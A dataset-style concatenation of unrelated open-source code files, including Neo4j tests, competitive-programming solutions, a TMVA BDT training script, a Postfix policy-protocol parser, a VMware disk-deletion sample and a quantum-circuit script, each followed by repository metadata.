and verify that exactly 1 repo is connected to the PythonLibrary without using a pinned specifier (RepoB).
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
# Note: don't query for relationship attributes in code that needs to be fast.
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{id:'cartography'})
WHERE r.specifier is NULL
RETURN count(repo) as repo_count
"""
nodes = neo4j_session.run(query)
actual_nodes = {n['repo_count'] for n in nodes}
expected_nodes = {1}
assert actual_nodes == expected_nodes
def test_setup_cfg_library_to_repo(neo4j_session):
"""
Ensure that repositories are connected to Python libraries stated as dependencies in setup.cfg.
and verify that exactly 2 repos are connected to the PythonLibrary.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
# Note: don't query for relationship attributes in code that needs to be fast.
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{id:'neo4j'})
RETURN count(repo) as repo_count
"""
nodes = neo4j_session.run(query)
actual_nodes = {n['repo_count'] for n in nodes}
expected_nodes = {2}
assert actual_nodes == expected_nodes
def test_python_library_in_multiple_requirements_files(neo4j_session):
"""
Ensure that repositories are connected to Python libraries stated as dependencies in
both setup.cfg and requirements.txt. Ensures that if the dependency has different
specifiers in each file, a separate node is created for each.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{name:'okta'})
RETURN lib.id as lib_ids
"""
nodes = neo4j_session.run(query)
node_ids = {n['lib_ids'] for n in nodes}
assert len(node_ids) == 2
assert node_ids == {'okta', 'okta|0.9.0'}
| [
"noreply@github.com"
] | noreply@github.com |
90777540d8bdcd99e145848d0134ea810df99bc4 | 2ce3d3e4c8e1e92359d94e08c421e44b8ef60b3a | /speedlimit/main.py | 98d3ae78c8ddfe16772d9454c51c1f02aaee36ec | [] | no_license | nhl4000/kattis | 0a2417b178d4543807eedbcb75b15e91f92ab63b | 4366682d82834b0330b38c403f5d27361840dfa9 | refs/heads/master | 2020-06-25T06:56:55.208802 | 2019-07-28T18:14:06 | 2019-07-28T18:14:06 | 199,238,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py |
distances = []
while(True):
distance = 0
previous_t = 0
i = int(raw_input())
if (i == -1):
break
for _ in range(i):
[s, t] = list(map(int, raw_input().split()))
distance += s * (t -previous_t)
previous_t = t
distances.append(str(distance)+" miles")
print("\n".join(distances)) | [
"marc.lozier@ryerson.ca"
] | marc.lozier@ryerson.ca |
47f4bbebd0ad96c1d2466f55070f18551eea1fa2 | 394d06f0839808157165de790aaaec2ef6b017b5 | /object-detection/demo_faster_rcnn.py | 98491509205318eb9a08c0dfa827276f461a0715 | [] | no_license | LXL1314/learn-gluoncv | 9d937d749af18e0915f11489d702d8e4dbc02d4a | 7bf8f2c0e638aae7b278744363f41a5cff7de5cc | refs/heads/master | 2020-07-07T22:45:32.361276 | 2019-08-29T12:53:52 | 2019-08-29T12:53:52 | 203,496,740 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | from gluoncv import utils, data, model_zoo
from matplotlib import pyplot as plt
net = model_zoo.faster_rcnn_resnet50_v1b_voc(pretrained=True)
im_fname = utils.download('https://github.com/dmlc/web-data/blob/master/' +
'gluoncv/detection/biking.jpg?raw=true',
path='../img/biking.jpg')
x, img = data.transforms.presets.rcnn.load_test(im_fname)
class_IDs, scores, bounding_boxes = net(x)
axe = utils.viz.plot_bbox(img, bboxes=bounding_boxes[0], scores=scores[0], labels=class_IDs[0], thresh=0.98, class_names=net.classes)
plt.show()
| [
"2995545137@qq.com"
] | 2995545137@qq.com |
b9af3fae8856807e32bf2d31ce7e14ead62f9716 | 27010a7ad70bf69511858a91d42dc7a64e61b66d | /src/1763_longest_nice_substring.py | f1a96df1b1ba601c788359bfd79537a5f6d61f4a | [
"Apache-2.0"
] | permissive | hariharanragothaman/leetcode-solutions | fb7d967f2c6e3f4c936e3c7afe369415bc8d2dc6 | 44e759f80d3c9df382fdf8d694d6378881e3649d | refs/heads/master | 2023-09-03T20:31:59.200701 | 2021-10-18T00:50:56 | 2021-10-18T00:50:56 | 267,927,538 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,765 | py | """
A string s is nice if, for every letter of the alphabet that s contains, it appears both in uppercase and lowercase. For example, "abABB" is nice because 'A' and 'a' appear, and 'B' and 'b' appear. However, "abA" is not because 'b' appears, but 'B' does not.
Given a string s, return the longest substring of s that is nice. If there are multiple, return the substring of the earliest occurrence. If there are none, return an empty string.
Example 1:
Input: s = "YazaAay"
Output: "aAa"
Explanation: "aAa" is a nice string because 'A/a' is the only letter of the alphabet in s, and both 'A' and 'a' appear.
"aAa" is the longest nice substring.
Example 2:
Input: s = "Bb"
Output: "Bb"
Explanation: "Bb" is a nice string because both 'B' and 'b' appear. The whole string is a substring.
Example 3:
Input: s = "c"
Output: ""
Explanation: There are no nice substrings.
Example 4:
Input: s = "dDzeE"
Output: "dD"
Explanation: Both "dD" and "eE" are the longest nice substrings.
As there are multiple longest nice substrings, return "dD" since it occurs earlier.
Constraints:
1 <= s.length <= 100
s consists of uppercase and lowercase English letters.
"""
class Solution:
def longestNiceSubstring(self, s: str) -> str:
max_length = 0
result = ""
for i in range(len(s)):
for j in range(i, len(s)):
substr = s[i : j + 1]
upper = "".join(c for c in substr if c.isupper())
lower = "".join(c for c in substr if c.islower())
upper = upper.lower()
if set(upper) == set(lower) and (len(substr) > max_length):
max_length = max(max_length, len(substr))
result = substr
return result
| [
"hariharanragothaman@gmail.com"
] | hariharanragothaman@gmail.com |
8a0ddb23a7769f47461a1435349c088c9d3eb109 | 7ac721ed23494b0916ddabba976211f9a54868d1 | /SexaQAnalysis/TMVA/Step1/old/BDT_2016.py | 3f9d75999f941188b02e60aa171a114d447d0292 | [] | no_license | jarnedc/SexaquarkStandalone | d0198e5ef2cad4a0ce91ef62a2225626a1f16729 | b59cd2ba9bcd01485864e310f9c22fc840b2dbc4 | refs/heads/master | 2020-07-06T09:46:14.087096 | 2019-12-13T10:23:35 | 2019-12-13T10:23:35 | 202,975,828 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,442 | py | import ROOT
from ROOT import *
# Select Theano as backend for Keras
from os import environ
version = "v_18_variables_AdaBoost_04092019_MCBkg_noInvMassCutInTreeProduction_NoInvMassCutInBDTScript"
# Open file
#SignFile = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Analyzed_Skimmed/CRAB_AnalyzerAllSkimmed_WithPU2016NeutrinoGun_tryToFix_8_10072019_v1/crab_AnalyzerAllStepsSkimmedSexaqWithPU2016NeutrinoGun_tryToFix_8_10072019_v1/190710_104816/FlatTree_WithPU2016NeutrinoGun_tryToFix_8_10072019_v1.root")
SignFile1 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaqWithPU2016NeutrinoGun_tryToFix_8_10072019_v1/FlatTree_Skimmed_trial10.root")
SignFile2 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaqWithPU2016NeutrinoGun_tryToFix_8_trial11_17072019_v1/crab_SkimmingSexaqWithPU2016NeutrinoGun_tryToFix_8_trial11_17072019_v1/190717_083219/FlatTree/FlatTree_Skimmed_trial11.root")
SignFile3 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaq_Skimming_trial13_25072019_v1/crab_SkimmingSexaq_trial13_25072019_v1/190725_051522/FlatTree_Skimmed_trial13.root")
SignFile4 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_Step1Sexaq_trial14/crab_Step1_Step2_Skimming_FlatTree_Sexaq_trial14_04082019_v1/190804_115510/FlatTree_Skimmed_trial14.root")
SignFile5 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaq_trial16/crab_Step1_Step2_Skimming_FlatTree_trial16_26082019_v1/190826_190802/combined_FlatTree_Skimmed_trial16.root")
#BkgFile = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/data_Sexaq/trialR/SingleElectron/FlatTree_SingleElectron2016_Background.root")
#BkgFile = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/data_Sexaq/trialR/SingleMuon/FlatTree_SingleMuonRun2016H_Background.root")
#Try Bkg sample without applying the inv_mass > 0 cut in the filling of the tree:
BkgFile = ROOT.TFile.Open("/user/jdeclerc/CMSSW_8_0_30_bis/src/SexaQAnalysis/AnalyzerAllSteps/test/FlatTreeProducer/FlatTree_SingleMuonRun2016H_Background_NoMinMassCut.root")
#Try as Bkg some background extracted from MC:
#BkgFile = ROOT.TFile.Open("/user/jdeclerc/CMSSW_8_0_30_bis/src/SexaQAnalysis/AnalyzerAllSteps/test/FlatTreeProducer/test_trial11_S_candidates_inMC.root")
# Get signal and background trees from file
SignalTree1 = SignFile1.Get("FlatTreeProducer/FlatTree")
SignalTree2 = SignFile2.Get("FlatTreeProducer/FlatTree")
SignalTree3 = SignFile3.Get("FlatTreeProducer/FlatTree")
SignalTree4 = SignFile4.Get("FlatTreeProducer/FlatTree")
SignalTree5 = SignFile5.Get("FlatTreeProducer/FlatTree")
BkgTree = BkgFile.Get("FlatTreeProducer/FlatTree")
# Add variables to dataloader
dataloader = ROOT.TMVA.DataLoader('dataset_BDT_2016')
#dataloader.AddVariable("_S_error_lxy_interaction_vertex") #selected
dataloader.AddVariable("_Ks_vz_decay_vertex") #selected --> might still be interesting
dataloader.AddVariable("_S_lxy_interaction_vertex") #selected
dataloader.AddVariable("_S_daughters_deltaphi")
dataloader.AddVariable("_S_daughters_deltaeta") # selected
dataloader.AddVariable("_S_daughters_openingsangle")
dataloader.AddVariable("_S_daughters_DeltaR")
dataloader.AddVariable("_S_Ks_openingsangle")
dataloader.AddVariable("_S_Lambda_openingsangle")
dataloader.AddVariable("_S_eta")
dataloader.AddVariable("_Ks_eta") # selected
dataloader.AddVariable("_Lambda_eta")
dataloader.AddVariable("_S_dxy_over_lxy") #selected
dataloader.AddVariable("_Ks_dxy_over_lxy") #selected
dataloader.AddVariable("_Lambda_dxy_over_lxy") #selected
#don't use following dxy variables as dxy_over_lxy seems the one which is most discriminating
#dataloader.AddVariable("_S_dxy_dzPVmin")
#dataloader.AddVariable("_Ks_dxy_dzPVmin")
#dataloader.AddVariable("_Lambda_dxy_dzPVmin")
#dataloader.AddVariable("_S_dxy")
#dataloader.AddVariable("_Ks_dxy")
#dataloader.AddVariable("_Lambda_dxy")
dataloader.AddVariable("_S_dz_min")
dataloader.AddVariable("_Ks_dz_min") # selected
dataloader.AddVariable("_Lambda_dz_min") #selected
#dataloader.AddVariable("_S_pt")
dataloader.AddVariable("_Ks_pt")# --> might still be interesting
#dataloader.AddVariable("_Lambda_pt")
# Add trees to dataloader
dataloader.AddSignalTree(SignalTree1, 1)
dataloader.AddSignalTree(SignalTree2, 1)
dataloader.AddSignalTree(SignalTree3, 1)
dataloader.AddSignalTree(SignalTree4, 1)
dataloader.AddSignalTree(SignalTree5, 1)
dataloader.AddBackgroundTree(BkgTree, 1)
trainTestSplit = 0.8
MasterCut = ROOT.TCut("\
Alt$(_S_error_lxy_interaction_vertex,0) < 0.1 &&\
(Alt$(_S_lxy_interaction_vertex,0) > 1.9 && Alt$(_S_lxy_interaction_vertex,0) < 12) &&\
Alt$(_S_chi2_ndof,0) < 4. && \
(Alt$(_S_daughters_deltaphi,0) < -0.6 || Alt$(_S_daughters_deltaphi,0) > 0.6) && \
Alt$(_S_daughters_openingsangle,0) < 1.6 && \
(Alt$(_S_daughters_deltaeta,0) > -2 && Alt$(_S_daughters_deltaeta,0) < 2) && \
Alt$(_S_Ks_openingsangle,0) < 1.4 && \
Alt$(_S_Lambda_openingsangle,0) < 1 && Alt$(_S_daughters_DeltaR,0) < 3.5 && \
(Alt$(_S_dxy_over_lxy,0) > 0 && Alt$(_S_dxy_over_lxy,0) < 0.25) && \
(Alt$(_S_dz_min,0) > -5 && Alt$(_S_dz_min,0) < 5)"
)
#Alt$(_S_mass,0) > 0. && Alt$(_S_chi2_ndof,0) < 4. && \
#Alt$(_S_daughters_deltaeta,0) < 2.5 && Alt$(_S_daughters_deltaeta,0) > -2.5 && \
#MasterCut = ROOT.TCut("Alt$(_S_error_lxy_interaction_vertex,0) < 0.1 && Alt$(_S_lxy_interaction_vertex,0) > 1.9 && Alt$(_S_mass,0) > 0. && Alt$(_S_chi2_ndof,0) < 4." )
dataloader.PrepareTrainingAndTestTree(MasterCut,\
'TrainTestSplit_Signal={}:'.format(trainTestSplit)+\
'TrainTestSplit_Background={}:'.format(trainTestSplit)+'SplitMode=Random')
# Setup TMVA
ROOT.TMVA.Tools.Instance()
ROOT.TMVA.PyMethodBase.PyInitialize()
outputFile = ROOT.TFile.Open('BDTOutput_2016_'+version+'.root', 'RECREATE')
factory = ROOT.TMVA.Factory('TMVAClassification', outputFile,
'!V:!Silent:Color:Transformations=I;D;P;G,D:'+\
'AnalysisType=Classification')
# BDT method
factory.BookMethod(dataloader,'BDT', 'BDT',
'H:!V:VarTransform=None:'+\
'NTrees=400:BoostType=AdaBoost:SeparationType=GiniIndex:nCuts=20:PruneMethod=CostComplexity:PruneStrength=12:UseBaggedBoost=True')
factory.TrainAllMethods()
factory.TestAllMethods()
factory.EvaluateAllMethods()
canvas = factory.GetROCCurve(dataloader)
canvas.Draw()
canvas.SaveAs("BDT_2016_"+version+".root")
| [
"jarne.theo.de.clercq@cern.ch"
] | jarne.theo.de.clercq@cern.ch |
01e4a166b1a96c6ed40e515a79db2f4f05132979 | 83957f263305c8021add5f05327381263cc6fdad | /mongrey/server/protocols.py | 92242373a487ab32a09578418932680ea295c321 | [
"BSD-3-Clause"
] | permissive | srault95/mongrey | d011727bb003ec02dd9797876a2cc055554d0ed9 | 63a94efd33db04e4b361dd259bfda3e520c305c8 | refs/heads/master | 2020-05-15T19:50:40.992062 | 2018-03-11T09:11:46 | 2018-03-11T09:11:46 | 35,269,256 | 0 | 0 | null | 2018-03-11T09:11:47 | 2015-05-08T08:58:12 | CSS | UTF-8 | Python | false | false | 4,686 | py | # -*- coding: utf-8 -*-
import uuid
import logging
import re
from .. import constants
from ..exceptions import InvalidProtocolError
line_regex = re.compile(r'^\s*([^=\s]+)\s*=(.*)$')
logger = logging.getLogger(__name__)
def parse_protocol_line(request):
"""
example:
client_name=123, client_address=1.1.1.1, sender=sender@example.net, recipient=rcpt@example.org
"""
try:
fields = dict(constants.ALL_FIELDS).keys()
protocol = dict([a.strip(',').split('=') for a in request.split()])
for key in fields:
if not key in protocol:
protocol[key] = None
if not "instance" in protocol:
protocol["instance"] = str(uuid.uuid1())
for key in protocol.copy().keys():
if not key in constants.POSTFIX_PROTOCOL['valid_fields'] + ['country']:
protocol.pop(key)
return protocol
except Exception, err:
logger.error(str(err))
def parse_policy_protocol(fileobj, debug=False):
"""
@see: http://www.postfix.org/SMTPD_POLICY_README.html
"""
protocol = {}
while True:
line = fileobj.readline()
if line:
line = line.strip()
if debug:
logger.debug(line)
if not line:
break
else:
m = line_regex.match(line)
if not m:
break
key = m.group(1)
value = m.group(2)
if len(protocol) == 0:
'''First line'''
if key != 'request':
raise InvalidProtocolError("Invalid Protocol")
if not value or value != 'smtpd_access_policy':
raise InvalidProtocolError("Invalid Protocol")
elif key == 'request':
'''request=smtpd_access_policy already parsing'''
raise InvalidProtocolError("Invalid Protocol")
if key in protocol:
logger.warn("key is already in protocol : %s" % key)
else:
value = value.decode('utf-8', 'ignore')
value = value.encode('us-ascii', 'ignore')
protocol[key] = value.lower()
request = protocol.get('request', None)
if not request:
raise InvalidProtocolError("Invalid Protocol")
else:
if request != 'smtpd_access_policy':
raise InvalidProtocolError("Invalid Protocol")
return protocol
def verify_protocol(protocol):
if not 'protocol_state' in protocol:
raise InvalidProtocolError("protocol_state field not in protocol")
protocol_state = protocol.get('protocol_state')
if not protocol_state.lower() in constants.ACCEPT_PROTOCOL_STATES:
raise InvalidProtocolError("this protocol_state is not supported: %s" % protocol_state)
for key in protocol.keys():
if not key.lower() in constants.POSTFIX_PROTOCOL['valid_fields']:
raise InvalidProtocolError("invalid field in protocol: %s" % key)
def tcp_table_protocol(fileobj, debug=False):
"""
@see: http://www.postfix.org/tcp_table.5.html
"""
protocol = {}
while True:
line = fileobj.readline()
if line:
line = line.strip()
if debug:
logger.debug(line)
if not line:
break
else:
"""
get SPACE key NEWLINE
Look up data under the specified key.
REPLY:
500 SPACE text NEWLINE
400 SPACE text NEWLINE
200 SPACE text NEWLINE
"""
return line
return protocol
def tcp_table_test():
"""
postconf -e "smtpd_client_restrictions = check_client_access tcp:127.0.0.0:15005"
postconf -e "smtpd_sender_restrictions = check_sender_access tcp:127.0.0.0:15005"
postconf -e "smtpd_recipient_restrictions = check_recipient_access tcp:127.0.0.0:15005, reject"
"""
from gevent.server import StreamServer
def handle(sock, address):
fileobj = sock.makefile()
key_search = tcp_table_protocol(fileobj, debug=True)
print "key_search : ", key_search
fileobj.write("200 TEST\n")
fileobj.close()
#sock.close()
server = StreamServer(listener=('127.0.0.0', 15005), handle=handle)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if __name__ == "__main__":
tcp_table_test() | [
"stephane.rault@radicalspam.org"
] | stephane.rault@radicalspam.org |
e18acdf10dc10f22be785b412c98734ef4391a78 | d190750d6cb34e9d86ae96724cf4b56a2f57a74a | /tests/r/test_morley.py | 562dc425811ab5a69db86c60b1d186302756d5a8 | [
"Apache-2.0"
] | permissive | ROAD2018/observations | a119f61a48213d791de0620804adb8d21c2ad9fb | 2c8b1ac31025938cb17762e540f2f592e302d5de | refs/heads/master | 2021-09-24T04:28:02.725245 | 2018-09-16T23:06:30 | 2018-09-16T23:06:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.morley import morley
def test_morley():
"""Test module morley.py by downloading
morley.csv and testing shape of
extracted data has 100 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = morley(test_path)
try:
assert x_train.shape == (100, 3)
except:
shutil.rmtree(test_path)
raise()
| [
"dustinviettran@gmail.com"
] | dustinviettran@gmail.com |
f1f37abf4b41bc03ab51f54e73615b835dc0f583 | 2d03be96751d29bc8e2686ee3a8bed890261b0fa | /Drivers/Community/ri_vmware-orchestration-driver/pyvmomi-community-samples/samples/fcd_delete_vdisk.py | 2ad0d42805eb70ef5a2c3cb00f63346d6723d57a | [
"MIT",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Spirent/Velocity-assets | 2007e4b565a40a4e5265c5e558c1af8ef703000e | 1d4233279d6c7a6c1145859d2bd3bd05d282ed3c | refs/heads/master | 2023-08-08T03:25:09.401108 | 2022-11-22T18:15:32 | 2022-11-22T18:15:32 | 105,230,520 | 5 | 20 | MIT | 2023-07-21T19:24:55 | 2017-09-29T04:40:38 | Python | UTF-8 | Python | false | false | 3,231 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Written by Chris Arceneaux
# GitHub: https://github.com/carceneaux
# Email: carceneaux@thinksis.com
# Website: http://arsano.ninja
#
# Note: Example code For testing purposes only
#
# This code has been released under the terms of the Apache-2.0 license
# http://opensource.org/licenses/Apache-2.0
"""
Python program for deleting a first class disk (fcd)
"""
import atexit
from tools import cli, tasks, disk
from pyVim import connect
from pyVmomi import vmodl
from pyVmomi import vim
def get_args():
"""
Adds additional args for deleting a fcd
-d datastore
-v vdisk
-y yes
"""
parser = cli.build_arg_parser()
parser.add_argument('-d', '--datastore',
required=True,
action='store',
help='Datastore name where disk is located')
parser.add_argument('-v', '--vdisk',
required=True,
action='store',
help='First Class Disk name to be deleted')
parser.add_argument('-y', '--yes',
action='store_true',
help='Confirm disk deletion.')
my_args = parser.parse_args()
return cli.prompt_for_password(my_args)
def main():
"""
Simple command-line program for deleting a snapshot of a first class disk.
"""
args = get_args()
try:
if args.disable_ssl_verification:
service_instance = connect.SmartConnectNoSSL(host=args.host,
user=args.user,
pwd=args.password,
port=int(args.port))
else:
service_instance = connect.SmartConnect(host=args.host,
user=args.user,
pwd=args.password,
port=int(args.port))
atexit.register(connect.Disconnect, service_instance)
content = service_instance.RetrieveContent()
# Retrieve Datastore Object
datastore = disk.get_obj(content, [vim.Datastore], args.datastore)
# Retrieve FCD Object
vdisk = disk.retrieve_fcd(content, datastore, args.vdisk)
# Confirming FCD deletion
if not args.yes:
response = cli.prompt_y_n_question("Are you sure you want to "
"delete vdisk '" + args.vdisk +
"'?",
default='no')
if not response:
print("Exiting script. User chose not to delete HDD.")
exit()
# Delete FCD
storage = content.vStorageObjectManager
task = storage.DeleteVStorageObject_Task(vdisk.config.id, datastore)
tasks.wait_for_tasks(service_instance, [task])
except vmodl.MethodFault as error:
print("Caught vmodl fault : " + error.msg)
return -1
return 0
# Start program
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
528f021c8e11f7846ea895d9ab7c934efff890de | 3d6632b1721128bdcaefd54af4617e3edadd3ca6 | /RunDir/python/SUSYHIT_SinglePhotonGrid_makeconfigfile.py | 9b8cce5e6386360d900e053c5f65eca57da7150e | [] | no_license | mtripiana/SUSYGrid | d1b5a844e0c907eac332c57fea23b4ee3d684368 | 29215cbdffac989f841a9c09e42553b4fcaafe50 | refs/heads/master | 2021-01-10T19:48:07.309947 | 2014-11-28T00:55:14 | 2014-11-28T00:55:14 | 33,213,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,184 | py | #! /usr/bin/python
#
import os, sys, commands
import posix
import getopt, string
import re, random, math
import posix
import time
from stat import *
from glob import glob
if len(sys.argv) < 2: # the program name and one argument
# stop the program and print an error message
sys.exit("Must provide output file name!")
############################################################################################
### COMMON PARAMETER ######
# scan inputs:
ReportProgressOnceEvery_SLHAs = 1000
#NumPoints = 10000
CFILE=sys.argv[1]
GRIDtype=str(sys.argv[2]) #0=gl_neut, 1=sq_neut
Hmass=sys.argv[3] #positive value to change Higgs mass!
tanBeta=sys.argv[4] #tanBeta value
if GRIDtype=='0':
#* >>> gluino_neutralino grid
#v_M1 = [200,250,300,350,400,450,500,550,600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300,1350,1400,1450,1500]
#v_mu = [140,200,270,330,385,440,492,540,595,647,698,749,800,850,902,953,1004,1055,1105,1156,1207,1258,1310,1363,1414,1465,1520]
#v_M1 = [600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300,1350,1400]
#v_mu = [590,647,698,749,800,850,902,953,1004,1055,1105,1156,1207,1258,1310,1361,1412]
#new setup as function of (regular) mu [04-04-2013] BR(chi10 -> Ggamma)~50%
#v_M1 = [600,647,697,745,795,845,893,942,990,1040,1090,1140,1190,1238,1288]#,1338,1388]
#v_mu = [600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300]#,1350,1400]
##FINAL SETUP 2014 (RunI paper)
v_mu = [150,175,200,250,350,450,550,650,750,850,950,1050,1150,1250,1300,1350]
v_M1 = [300,270,267,288,365,456,551,647,745,845,942,1040,1140,1238,1288,1338]
v_M3 = [300,400,500,600,800,850,900,950,1000,1050,1100,1150,1200,1250,1300,1350,1400]
v_Msq = [2500]
elif GRIDtype=='1':
#* >>> sq_neutralino grid
#new setup as function of (regular) mu [04-04-2013] BR(chi10 -> Ggamma)~50%
v_M1 = [600,647,697,745,795,845,893,942,990,1040,1090,1140,1190,1238,1288]#,1338,1388]
v_mu = [600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300]#,1350,1400]
v_M3 = [2500]
v_Msq = [800,850,900,950,1000,1050,1100,1150,1200,1250,1300]
elif GRIDtype=='2':
#* >>> EWK neutralino grid
#new setup as function of (regular) mu [04-04-2013] BR(chi10 -> Ggamma)~50%
v_M1 = [157,180,205,54,352,451,549,647,745,845,942,1040,1140,1238]
v_mu = [150,175,200,250,350,450,550,650,750,850,950,1050,1150,1250]
v_M3 = [2500]
v_Msq = [2500]
else:
sys.exit(0)
Minmu=400 # min f , mu = M1/f
Maxmu=1300 # max f , mu = M1/f
MinM1=400 # min f , mu = M1/f
MaxM1=1300 # max f , mu = M1/f
MinM1mu=0.98 # min f , mu = M1/f
MaxM1mu=1.0 # max f , mu = M1/f
v_At = [0] #At possible values
doGmassScan=False # Gravitino mass scan
minGmass=1E-10
maxGmass=1E-06
GmassPoints=1
stepGmass=(maxGmass-minGmass)/GmassPoints
useM1muRelation=False
useFixedMu=True
useMuPositive=True
vbos=False
#open config file
fo = open(CFILE, "wb")
################################################################################
# SUSY-HIT: generate SLHA files one by one
Progress = 0
for atv in v_At:
for imu in range(len(v_mu)):
for m3v in v_M3:
for msqv in v_Msq:
iGmv = 0
while iGmv < GmassPoints:
iGmv += 1
Progress += 1
M1 = v_M1[imu]
M3 = m3v
Msq = msqv
mu = v_mu[imu]
#make sure that the (aprox) M(chi10) is greater than M(gluino)
# if M1 >= M3:
if mu > M3:
continue
# if M1 >= Msq:
if mu > Msq:
continue
if useM1muRelation==True:
M1 = (mu * random.uniform(MinM1mu, MaxM1mu)) * ((-1) ** random.randint(0,1))
elif useFixedMu==True:
M1 = v_M1[imu]
else:
M1 = random.randint(MinM1, MaxM1) * ((-1) ** random.randint(0,1))
if useMuPositive==True:
mu = math.fabs(mu)
At = atv
if doGmassScan==True:
Gmass = minGmass + iGmv*stepGmass
else:
Gmass = -999
if (Progress % ReportProgressOnceEvery_SLHAs == 0):
print 'SUSY-HIT',Progress,'points'# through',GmassNumPoints
fo.write(str(M1)+' '+str(mu)+' '+str(M3)+' '+str(Msq)+' '+str(At)+' '+str(Gmass)+' '+str(iGmv)+' '+str(GRIDtype)+' '+str(Hmass)+' '+str(tanBeta)+' \n');
#end of loops
# Close config file
fo.close()
| [
"mtripiana@users.noreply.github.com"
] | mtripiana@users.noreply.github.com |
ed22cd98ccc5c3ab583769e5ced040437212592d | 3f97f0ba5351aae879cae3c6c073d64077ee96bd | /ch99/photo/migrations/0001_initial.py | 14effa898a4c93b21d9524971d9600907b03422d | [
"MIT"
] | permissive | dukuaris/django_web | 7b8e63d82718afc2a7aedd97ceed97f8aeab4040 | d6e8486999a8db8fc99c4b7dae0ddac402828c9d | refs/heads/master | 2023-01-07T09:02:06.316075 | 2020-01-28T06:46:27 | 2020-01-28T06:46:27 | 232,438,676 | 0 | 0 | MIT | 2022-12-27T15:36:34 | 2020-01-07T23:45:17 | HTML | UTF-8 | Python | false | false | 1,543 | py | # Generated by Django 2.2.2 on 2020-01-16 09:54
from django.db import migrations, models
import django.db.models.deletion
import photo.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, verbose_name='NAME')),
('description', models.CharField(blank=True, max_length=100, verbose_name='One Line Description')),
],
options={
'ordering': ('name',),
},
),
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30, verbose_name='TITLE')),
('description', models.TextField(blank=True, verbose_name='Photo Description')),
('image', photo.fields.ThumbnailImageField(upload_to='photo/%Y/%m', verbose_name='IMAGE')),
('upload_dt', models.DateTimeField(auto_now_add=True, verbose_name='UPLOAD DATE')),
('album', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='photo.Album')),
],
options={
'ordering': ('title',),
},
),
]
| [
"dukuaris@gmail.com"
] | dukuaris@gmail.com |
073c3efb2dc0e05f5668c065c6a14749d6d65f4c | 0e25dc15ae9efce8bfd716d4d2041da07767968b | /qbench/benchmarks/RevLib/OPENQL_converted/cycle10_2_110.py | 38015650e921d4e45307087e364e05df9a9bb531 | [] | no_license | alxhotel/crossbar-bench | f608fc0062b4f8a5162ec33d61c0204aaf27b6ff | 3bf7536e7697d29c3089b0ba564ba22d39698b88 | refs/heads/master | 2021-07-13T16:06:50.085838 | 2020-10-04T23:39:05 | 2020-10-04T23:39:05 | 213,409,122 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 143,382 | py | from openql import openql as ql
import os
import argparse
def circuit(config_file, new_scheduler='yes', scheduler='ASAP', uniform_sched= 'no', sched_commute = 'yes', mapper='base', moves='no', maptiebreak='random', initial_placement='no', output_dir_name='test_output', optimize='no', measurement=True, log_level='LOG_WARNING'):
curdir = os.path.dirname(__file__)
output_dir = os.path.join(curdir, output_dir_name)
ql.set_option('output_dir', output_dir)
ql.set_option('optimize', optimize)
ql.set_option('scheduler', scheduler)
ql.set_option('scheduler_uniform', uniform_sched)
ql.set_option('mapper', mapper)
ql.set_option('initialplace', initial_placement)
ql.set_option('log_level', log_level)
ql.set_option('scheduler_post179', new_scheduler)
ql.set_option('scheduler_commute', sched_commute)
ql.set_option('mapusemoves', moves)
ql.set_option('maptiebreak', maptiebreak)
config_fn = os.path.join(curdir, config_file)
# platform = ql.Platform('platform_none', config_fn)
platform = ql.Platform('starmon', config_fn)
sweep_points = [1,2]
num_circuits = 1
num_qubits = 12
p = ql.Program('cycle10_2_110', platform, num_qubits)
p.set_sweep_points(sweep_points, num_circuits)
k = ql.Kernel('cycle10_2_110', platform, num_qubits)
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
